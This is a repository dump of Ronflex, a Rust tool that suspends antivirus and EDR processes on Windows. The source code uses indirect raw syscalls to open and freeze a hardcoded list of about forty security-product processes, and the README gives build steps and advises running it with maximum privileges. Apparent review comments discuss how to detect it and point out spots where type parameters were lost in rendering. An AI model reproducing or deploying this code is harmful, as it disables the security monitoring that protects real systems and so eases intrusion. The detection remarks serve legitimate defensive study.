├── .github └── workflows │ └── rust.yml ├── .gitignore ├── Cargo.lock ├── Cargo.toml ├── README.md ├── img └── ronflex_notepad.png └── src └── main.rs
/.github/workflows/rust.yml:
--------------------------------------------------------------------------------
name: Rust

on:
  push:
    branches: [ "master" ]
  pull_request:
    branches: [ "master" ]

env:
  CARGO_TERM_COLOR: always

# NOTE(review): there is no top-level `permissions:` key, so the job runs with
# the repository's default GITHUB_TOKEN scope. A build-only workflow needs at
# most `permissions: { contents: read }`.
jobs:

  build-win:
    runs-on: windows-latest

    steps:
      - name: Checkout
        # NOTE(review): floating major tag. Pinning to a full commit SHA means a
        # moved or re-tagged upstream release cannot change what runs here.
        uses: actions/checkout@v3

      - name: Install latest rust toolchain
        # NOTE(review): the actions-rs organisation appears to be unmaintained
        # (its repositories are archived); the same tag-vs-SHA pinning point
        # applies, and dtolnay/rust-toolchain is a maintained alternative.
        uses: actions-rs/toolchain@v1
        with:
          toolchain: stable
          default: true
          override: true

      - name: Build
        run: cargo build --release --verbose
-------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | /target -------------------------------------------------------------------------------- /Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 
3 | version = 3 4 | 5 | [[package]] 6 | name = "atty" 7 | version = "0.2.14" 8 | source = "registry+https://github.com/rust-lang/crates.io-index" 9 | checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" 10 | dependencies = [ 11 | "hermit-abi 0.1.19", 12 | "libc", 13 | "winapi", 14 | ] 15 | 16 | [[package]] 17 | name = "autocfg" 18 | version = "1.1.0" 19 | source = "registry+https://github.com/rust-lang/crates.io-index" 20 | checksum = "d468802bab17cbc0cc575e9b053f41e72aa36bfa6b7f55e3529ffa43161b97fa" 21 | 22 | [[package]] 23 | name = "cfg-if" 24 | version = "1.0.0" 25 | source = "registry+https://github.com/rust-lang/crates.io-index" 26 | checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" 27 | 28 | [[package]] 29 | name = "colored" 30 | version = "2.0.0" 31 | source = "registry+https://github.com/rust-lang/crates.io-index" 32 | checksum = "b3616f750b84d8f0de8a58bda93e08e2a81ad3f523089b05f1dffecab48c6cbd" 33 | dependencies = [ 34 | "atty", 35 | "lazy_static", 36 | "winapi", 37 | ] 38 | 39 | [[package]] 40 | name = "core-foundation-sys" 41 | version = "0.8.4" 42 | source = "registry+https://github.com/rust-lang/crates.io-index" 43 | checksum = "e496a50fda8aacccc86d7529e2c1e0892dbd0f898a6b5645b5561b89c3210efa" 44 | 45 | [[package]] 46 | name = "crossbeam-channel" 47 | version = "0.5.8" 48 | source = "registry+https://github.com/rust-lang/crates.io-index" 49 | checksum = "a33c2bf77f2df06183c3aa30d1e96c0695a313d4f9c453cc3762a6db39f99200" 50 | dependencies = [ 51 | "cfg-if", 52 | "crossbeam-utils", 53 | ] 54 | 55 | [[package]] 56 | name = "crossbeam-deque" 57 | version = "0.8.3" 58 | source = "registry+https://github.com/rust-lang/crates.io-index" 59 | checksum = "ce6fd6f855243022dcecf8702fef0c297d4338e226845fe067f6341ad9fa0cef" 60 | dependencies = [ 61 | "cfg-if", 62 | "crossbeam-epoch", 63 | "crossbeam-utils", 64 | ] 65 | 66 | [[package]] 67 | name = "crossbeam-epoch" 68 | version = "0.9.14" 69 | source = 
"registry+https://github.com/rust-lang/crates.io-index" 70 | checksum = "46bd5f3f85273295a9d14aedfb86f6aadbff6d8f5295c4a9edb08e819dcf5695" 71 | dependencies = [ 72 | "autocfg", 73 | "cfg-if", 74 | "crossbeam-utils", 75 | "memoffset", 76 | "scopeguard", 77 | ] 78 | 79 | [[package]] 80 | name = "crossbeam-utils" 81 | version = "0.8.15" 82 | source = "registry+https://github.com/rust-lang/crates.io-index" 83 | checksum = "3c063cd8cc95f5c377ed0d4b49a4b21f632396ff690e8470c29b3359b346984b" 84 | dependencies = [ 85 | "cfg-if", 86 | ] 87 | 88 | [[package]] 89 | name = "either" 90 | version = "1.8.1" 91 | source = "registry+https://github.com/rust-lang/crates.io-index" 92 | checksum = "7fcaabb2fef8c910e7f4c7ce9f67a1283a1715879a7c230ca9d6d1ae31f16d91" 93 | 94 | [[package]] 95 | name = "hermit-abi" 96 | version = "0.1.19" 97 | source = "registry+https://github.com/rust-lang/crates.io-index" 98 | checksum = "62b467343b94ba476dcb2500d242dadbb39557df889310ac77c5d99100aaac33" 99 | dependencies = [ 100 | "libc", 101 | ] 102 | 103 | [[package]] 104 | name = "hermit-abi" 105 | version = "0.2.6" 106 | source = "registry+https://github.com/rust-lang/crates.io-index" 107 | checksum = "ee512640fe35acbfb4bb779db6f0d80704c2cacfa2e39b601ef3e3f47d1ae4c7" 108 | dependencies = [ 109 | "libc", 110 | ] 111 | 112 | [[package]] 113 | name = "lazy_static" 114 | version = "1.4.0" 115 | source = "registry+https://github.com/rust-lang/crates.io-index" 116 | checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" 117 | 118 | [[package]] 119 | name = "libc" 120 | version = "0.2.141" 121 | source = "registry+https://github.com/rust-lang/crates.io-index" 122 | checksum = "3304a64d199bb964be99741b7a14d26972741915b3649639149b2479bb46f4b5" 123 | 124 | [[package]] 125 | name = "memoffset" 126 | version = "0.8.0" 127 | source = "registry+https://github.com/rust-lang/crates.io-index" 128 | checksum = "d61c719bcfbcf5d62b3a09efa6088de8c54bc0bfcd3ea7ae39fcc186108b8de1" 129 | dependencies = [ 
130 | "autocfg", 131 | ] 132 | 133 | [[package]] 134 | name = "ntapi" 135 | version = "0.4.0" 136 | source = "registry+https://github.com/rust-lang/crates.io-index" 137 | checksum = "bc51db7b362b205941f71232e56c625156eb9a929f8cf74a428fd5bc094a4afc" 138 | dependencies = [ 139 | "winapi", 140 | ] 141 | 142 | [[package]] 143 | name = "num_cpus" 144 | version = "1.15.0" 145 | source = "registry+https://github.com/rust-lang/crates.io-index" 146 | checksum = "0fac9e2da13b5eb447a6ce3d392f23a29d8694bff781bf03a16cd9ac8697593b" 147 | dependencies = [ 148 | "hermit-abi 0.2.6", 149 | "libc", 150 | ] 151 | 152 | [[package]] 153 | name = "once_cell" 154 | version = "1.17.1" 155 | source = "registry+https://github.com/rust-lang/crates.io-index" 156 | checksum = "b7e5500299e16ebb147ae15a00a942af264cf3688f47923b8fc2cd5858f23ad3" 157 | 158 | [[package]] 159 | name = "rayon" 160 | version = "1.7.0" 161 | source = "registry+https://github.com/rust-lang/crates.io-index" 162 | checksum = "1d2df5196e37bcc87abebc0053e20787d73847bb33134a69841207dd0a47f03b" 163 | dependencies = [ 164 | "either", 165 | "rayon-core", 166 | ] 167 | 168 | [[package]] 169 | name = "rayon-core" 170 | version = "1.11.0" 171 | source = "registry+https://github.com/rust-lang/crates.io-index" 172 | checksum = "4b8f95bd6966f5c87776639160a66bd8ab9895d9d4ab01ddba9fc60661aebe8d" 173 | dependencies = [ 174 | "crossbeam-channel", 175 | "crossbeam-deque", 176 | "crossbeam-utils", 177 | "num_cpus", 178 | ] 179 | 180 | [[package]] 181 | name = "ronflex" 182 | version = "0.1.0" 183 | dependencies = [ 184 | "colored", 185 | "ntapi", 186 | "rust_syscalls", 187 | "sysinfo", 188 | "winapi", 189 | ] 190 | 191 | [[package]] 192 | name = "rust_syscalls" 193 | version = "0.1.0" 194 | source = "git+https://github.com/Nariod/rust_syscalls#162451aaf095c8cb8c5e6b33ebf0bf44c62aca34" 195 | dependencies = [ 196 | "ntapi", 197 | "winapi", 198 | ] 199 | 200 | [[package]] 201 | name = "scopeguard" 202 | version = "1.1.0" 203 | source = 
"registry+https://github.com/rust-lang/crates.io-index" 204 | checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" 205 | 206 | [[package]] 207 | name = "sysinfo" 208 | version = "0.28.4" 209 | source = "registry+https://github.com/rust-lang/crates.io-index" 210 | checksum = "b4c2f3ca6693feb29a89724516f016488e9aafc7f37264f898593ee4b942f31b" 211 | dependencies = [ 212 | "cfg-if", 213 | "core-foundation-sys", 214 | "libc", 215 | "ntapi", 216 | "once_cell", 217 | "rayon", 218 | "winapi", 219 | ] 220 | 221 | [[package]] 222 | name = "winapi" 223 | version = "0.3.9" 224 | source = "registry+https://github.com/rust-lang/crates.io-index" 225 | checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" 226 | dependencies = [ 227 | "winapi-i686-pc-windows-gnu", 228 | "winapi-x86_64-pc-windows-gnu", 229 | ] 230 | 231 | [[package]] 232 | name = "winapi-i686-pc-windows-gnu" 233 | version = "0.4.0" 234 | source = "registry+https://github.com/rust-lang/crates.io-index" 235 | checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" 236 | 237 | [[package]] 238 | name = "winapi-x86_64-pc-windows-gnu" 239 | version = "0.4.0" 240 | source = "registry+https://github.com/rust-lang/crates.io-index" 241 | checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" 242 | -------------------------------------------------------------------------------- /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "ronflex" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sysinfo = "0.28.4" 10 | colored = "2.0.0" 11 | winapi = "0.3.9" 12 | ntapi = "0.4.0" 13 | rust_syscalls = {git = "https://github.com/Nariod/rust_syscalls", features = ["_INDIRECT_"]} -------------------------------------------------------------------------------- 
/README.md: -------------------------------------------------------------------------------- 1 | # Ronflex 2 | Attempts to suspend all known AV/EDR processes on Windows using syscalls and the undocumented NtSuspendProcess API. Made with <3 for pentesters. Written in Rust. 3 | 4 | ## WARNING 5 | Ronflex tries to suspend all known AV/EDRs and other security product processes. There is a high chance that the system will be unstable after Ronflex did its thing! Use at your own risk. 6 | 7 | ## Known limitations 8 | At the moment, Ronflex is not able to suspend processes protected by Anti-Malware Protected Process (AM-PPL), which is now quite common. WIP.. 9 | 10 | ## Todo 11 | - [x] Loop over known processes to suspend them 12 | - [x] Support for a specific process target 13 | - [x] Move the NtSuspendProcess and NtClose API calls to syscalls 14 | - [x] Move the remaining API calls to syscalls 15 | - [ ] Dynamically load the list of known processes from a file at compile time 16 | - [ ] Embed a method to bypass AM-PPL. [PPLmedic](https://github.com/itm4n/PPLmedic) maybe? 17 | 18 | # Quick start 19 | No time? Let's make it short then. 20 | 21 | ## Binary 22 | In case of an emergency, you will find a ready-to-deploy x64 binary for Windows in the repo's Release section. However, consider taking the time to compile it yourself. 
23 | 24 | ## Cross-compile from Linux 25 | 26 | Install and configure Rust: 27 | - https://www.rust-lang.org/tools/install 28 | - `rustup target add x86_64-pc-windows-gnu` 29 | 30 | Build the binary: 31 | - `git clone https://github.com/Nariod/ronflex.git` 32 | - `cd ronflex` 33 | - `cargo build --release --target x86_64-pc-windows-gnu` 34 | 35 | ## Compile on Windows 36 | 37 | Install and configure Rust: 38 | - https://www.rust-lang.org/tools/install 39 | - `rustup target add x86_64-pc-windows-msvc` 40 | 41 | Build the binary: 42 | - `git clone https://github.com/Nariod/ronflex.git` 43 | - `cd ronflex` 44 | - `cargo build --release` 45 | 46 | ## Usage 47 | Run the binary with the highest privileges you can and without argument to freeze all known security products: 48 | - `ronflex.exe` 49 | 50 | Alternatively, you can freeze a specific target process by passing the exact process name: 51 | - `ronflex.exe notepad.exe` 52 | 53 | ![Notepad put to sleep](img/ronflex_notepad.png) 54 | 55 | # Usage and details 56 | WIP 57 | 58 | ## Credits 59 | - janoglezcampos for his [rust_syscalls](https://github.com/janoglezcampos/rust_syscalls) project 60 | - [The Sliver project](https://github.com/BishopFox/sliver) for the list of known AV/EDRs processes 61 | - Rust discord 62 | - StackOverflow 63 | 64 | ## Legal disclaimer 65 | Usage of anything presented in this repo to attack targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes. 
66 | -------------------------------------------------------------------------------- /img/ronflex_notepad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Nariod/ronflex/f979a2a4f6c36cbe5d377f33ea4f5279752f4d87/img/ronflex_notepad.png -------------------------------------------------------------------------------- /src/main.rs: --------------------------------------------------------------------------------
//! Ronflex: suspends running processes selected by exact image name.
//!
//! Per matching process (see [`evil`]): `NtOpenProcess` with
//! `PROCESS_SUSPEND_RESUME`, then `NtSuspendProcess`, then `NtClose`, each
//! issued through `rust_syscalls::syscall!` rather than through an ntdll
//! export. Without a command-line argument, [`main`] walks a fixed list of
//! security-product image names.
//!
//! NOTE(review): because the calls are raw syscalls, user-mode hooks on the
//! ntdll exports will not observe them; detection has to come from kernel-side
//! process-access telemetry (a handle to a security-product process being
//! opened with `PROCESS_SUSPEND_RESUME`). A suspended process still exists, so
//! a health check that only verifies the process is present would presumably
//! not notice; a heartbeat-style liveness check would.
use colored::Colorize;
use ntapi::ntapi_base::CLIENT_ID;
use rust_syscalls::syscall;
use std::env;
use std::mem::size_of;
use sysinfo::PidExt;
use sysinfo::ProcessExt;
use sysinfo::SystemExt;
use winapi::shared::ntdef::{HANDLE, NTSTATUS, NULL, OBJECT_ATTRIBUTES};
use winapi::um::winnt::PROCESS_SUSPEND_RESUME;

/// Suspends every running process whose image name is exactly `target`.
///
/// Each match is opened with `PROCESS_SUSPEND_RESUME`. A non-zero NTSTATUS
/// from `NtOpenProcess` is printed and the process is skipped; otherwise
/// `NtSuspendProcess` is issued on the handle, the outcome is printed, and the
/// handle is closed with `NtClose` whether or not the suspend succeeded.
///
/// All reporting goes to stdout via `println!`; nothing is returned, so the
/// caller cannot tell how many processes were actually suspended.
fn evil(target: &str) {
    // Fresh snapshot of the process table on every call.
    let system = sysinfo::System::new_all();

    // Exact-name match; whether the comparison is case-sensitive is up to
    // sysinfo and is not verified here.
    for p in system.processes_by_exact_name(target) {
        println!("Targeting process: {} with PID: {}", p.name(), p.pid());
        let pid: u32 = p.pid().as_u32();

        // CLIENT_ID carries only the process id; UniqueThread is left at zero.
        let cid: CLIENT_ID = CLIENT_ID {
            UniqueProcess: pid as _,
            UniqueThread: 0 as _,
        };

        // Empty attributes: no object name, root directory, security
        // descriptor or QoS. Only Length is set.
        let oa: OBJECT_ATTRIBUTES = OBJECT_ATTRIBUTES {
            // NOTE(review): the turbofish argument was lost in the page
            // rendering; presumably size_of::<OBJECT_ATTRIBUTES>().
            Length: size_of::() as _,
            RootDirectory: NULL,
            ObjectName: NULL as _,
            Attributes: 0,
            SecurityDescriptor: NULL,
            SecurityQualityOfService: NULL,
        };

        // Out-parameter filled in by NtOpenProcess.
        let mut handle: HANDLE = NULL;
        let mut ntstatus: NTSTATUS;

        // `oa`, `cid` and `handle` are locals of this loop iteration, so the
        // pointers handed to the syscalls stay valid for the whole block.
        unsafe {
            ntstatus = syscall!(
                "NtOpenProcess",
                &mut handle,
                PROCESS_SUSPEND_RESUME,
                &oa,
                &cid
            );

            // 0 is STATUS_SUCCESS; anything else is reported and the process
            // skipped. NOTE(review): no NtClose on this path — assumes
            // NtOpenProcess leaves `handle` unset when it fails; confirm.
            match ntstatus {
                0 => {}
                _ => {
                    let message = format!(
                        "[-] Error accessing process: {} with PID: {}. NTSTATUS: {}. Skipping..",
                        p.name(),
                        p.pid(),
                        ntstatus
                    )
                    .red();
                    println!("{}", message);
                    continue;
                }
            };

            // Suspend request; the status is only printed, never propagated.
            ntstatus = syscall!("NtSuspendProcess", handle);

            match ntstatus {
                0 => {
                    let message = format!("[+] Ronflex worked! Have a good night {}", &pid).green();
                    println!("{}", message);
                }
                _ => {
                    let message = format!("[-] Ronflex failed.. NTSTATUS: {}", ntstatus).red();
                    println!("{}", message);
                }
            }

            // Handle is released on both outcomes; the close status is
            // deliberately ignored.
            let _ = syscall!("NtClose", handle);
        }
    }
}

/// Entry point: one argument selects a single target image name; otherwise
/// every name in the built-in product list is passed to [`evil`] in turn.
fn main() {
    // product list source https://github.com/BishopFox/sliver/blob/041ae65c61629e65646623e472d658472022d84e/client/command/processes/ps.go
    // Image names only; matching in `evil` is by exact name.
    let product_list: Vec<&str> = vec![
        "ccSvcHst.exe",
        "cb.exe",
        "RepMgr.exe",
        "RepUtils.exe",
        "RepUx.exe",
        "RepWSC.exe",
        "scanhost.exe",
        "MsMpEng.exe",
        "SenseIR.exe",
        "SenseCncProxy.exe",
        "MsSense.exe",
        "MpCmdRun.exe",
        "MonitoringHost.exe",
        "HealthService.exe",
        "smartscreen.exe",
        "CSFalconService.exe",
        "CSFalconContainer.exe",
        "bdservicehost.exe",
        "bdagent.exe",
        "bdredline.exe",
        "coreServiceShell.exe",
        "ds_monitor.exe",
        "Notifier.exe",
        "dsa.exe",
        "ds_nuagent.exe",
        "coreFrameworkHost.exe",
        "SentinelServiceHost.exe",
        "SentinelStaticEngine.exe",
        "SentinelStaticEngineScanner.exe",
        "SentinelAgent.exe",
        "SentinelAgentWorker.exe",
        "SentinelHelperService.exe",
        "SentinelBrowserNativeHost.exe",
        "SentinelUI.exe",
        "Sysmon.exe",
        "Sysmon64.exe",
        "CylanceSvc.exe",
        "CylanceUI.exe",
        "TaniumClient.exe",
        "TaniumCX.exe",
        "TaniumDetectEngine.exe",
    ];

    // NOTE(review): element type lost in the page rendering; presumably
    // Vec<String>.
    let args: Vec = env::args().collect();

    // Advisory only: nothing below inspects the current token or privileges.
    println!("Run this tool as SYSTEM for maximum effect");

    // Exactly one argument (argv[0] plus the name) selects single-target mode.
    // NOTE(review): any other argument count, including extra arguments,
    // silently falls through to the full product list instead of reporting a
    // usage error.
    if args.len() == 2 {
        println!(
            "[+] Executing tool in custom target mode. Targeting {} process",
            &args[1]
        );
        let target = &args[1];
        evil(target);
    } else {
        println!("[+] Starting. Attempting to clean your system from nasty AV/EDR solutions..");
        for target in product_list {
            evil(target);
        }
    }
}
--------------------------------------------------------------------------------